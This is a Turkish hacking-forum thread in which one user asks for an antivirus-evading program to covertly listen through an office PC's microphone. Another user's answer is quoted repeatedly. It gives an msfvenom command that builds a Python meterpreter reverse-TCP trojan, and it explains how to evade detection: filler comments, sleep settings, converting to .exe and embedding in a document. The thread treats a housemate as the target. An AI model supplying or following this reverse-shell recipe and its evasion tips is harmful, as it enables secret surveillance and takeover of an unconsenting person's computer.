Çözüldü Pc Mic Ortam Dinleme Programı - Aranıyor

nolfin

Yeni üye
9 Ağu 2009
15
1
Merhaba arkadaşlar,

herhangi bir ofis pc içine bir dosya kurup, istediğim zaman net bağlı olduğu sürece ortamı o pc mikrofundan daha çok laptoptan ortam dinleme programı var mıdır ?

Ücretli de olabilir. Anti lere yakalanmayacak.

DDarkStyle

Katılımcı Üye
21 Eyl 2021
360
139
Dysnomia
bırde erısımım var ama tıkladıgım anda direk antivirüs sıler dıye dusundum. çok eskilerde vatosajan ve ardamax vs kullanıyordum ama onlarda da sanırım güncellekte calısan bır program yok, olanları da pek denemedım ısımı gormez dıye.
Python biliyorsanız Trojani kendiniz yapabilirsiniz msfvenom'dan <dosya_ismi>.py diye çıktı alıp devamını siz düzenleyebilirsiniz ayrıca satır aralarına "#yazmakistedigin" gibi şeyler yazarsanız yakalanma oranı düşecektir sleep ayarları gibi şeyleri de halledersen yakalanma oranı düşer baya. Daha sonra .py uzantısını .exe çevirirsin ve bir .txt dosyasına veya .doc'a gömersin muhtemelen yakalayamaz benim virüstotal'den full geçen virus yapmışlığım olmuştu. Ayrıca erişiminizde var ise sosyal mühendisliğe gerek kalmayacaktır direkt kendiniz açarsınız.

DDarkStyle

Katılımcı Üye
21 Eyl 2021
360
139
Dysnomia
böcek koyma gıbı olur. o kadar kafayı kırsam, sim kartlı seyyar kablo takarım ama mesele pc üzerinden bunu yapmak :)
Python biliyorsanız Trojani kendiniz yapabilirsiniz msfvenom'dan <dosya_ismi>.py diye çıktı alıp devamını siz düzenleyebilirsiniz ayrıca satır aralarına "#yazmakistedigin" gibi şeyler yazarsanız yakalanma oranı düşecektir sleep ayarları gibi şeyleri de halledersen yakalanma oranı düşer baya. Daha sonra .py uzantısını .exe çevirirsin ve bir .txt dosyasına veya .doc'a gömersin muhtemelen yakalayamaz benim virüstotal'den full geçen virus yapmışlığım olmuştu. Ayrıca erişiminizde var ise sosyal mühendisliğe gerek kalmayacaktır direkt kendiniz açarsınız.

DDarkStyle

Katılımcı Üye
21 Eyl 2021
360
139
Dysnomia
Öncelikle msfvenom üzerinden .py uzantılı bir virüs oluşturun.
Virüs oluşturmak için terminal ekranımıza :

Kod:
msfvenom -p python/meterpreter/reverse_tcp LHOST=ip_adresiniz LPORT=4444 R > /home/kali/Desktop <dosya_adi>.py

yazıyoruz ve .py uzantılı virüsümüz oluşuyor dediğiniz üzere ev arkadaşınız olduğu için iç İP'nizi yazmanız gerekecek.

nolfin

Yeni üye
9 Ağu 2009
15
1
Virüs oluşturmak için terminal ekranımıza :

Kod:
msfvenom -p python/meterpreter/reverse_tcp LHOST=ip_adresiniz LPORT=4444 R > /home/kali/Desktop <dosya_adi>.py

yazıyoruz ve .py uzantılı virüsümüz oluşuyor dediğiniz üzere ev arkadaşınız olduğu için iç İP'nizi yazmanız gerekecek.
ilginize çok teşekkür ederim. biraz youtbe felan izleyeyim bir ara flash belleğe kali kurmuştum. ama tam olarak neyden bahsediyorsunuz anlamadım :) biraz kafa yormam lazım. güzel bir exe dosyam olsa süper olacakta :) bir kaç blog okudum çoğu virüstotal de tarama yaptığından takıldığı için, iyi bir kod yazmak gerektiği bahsediliyordu

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.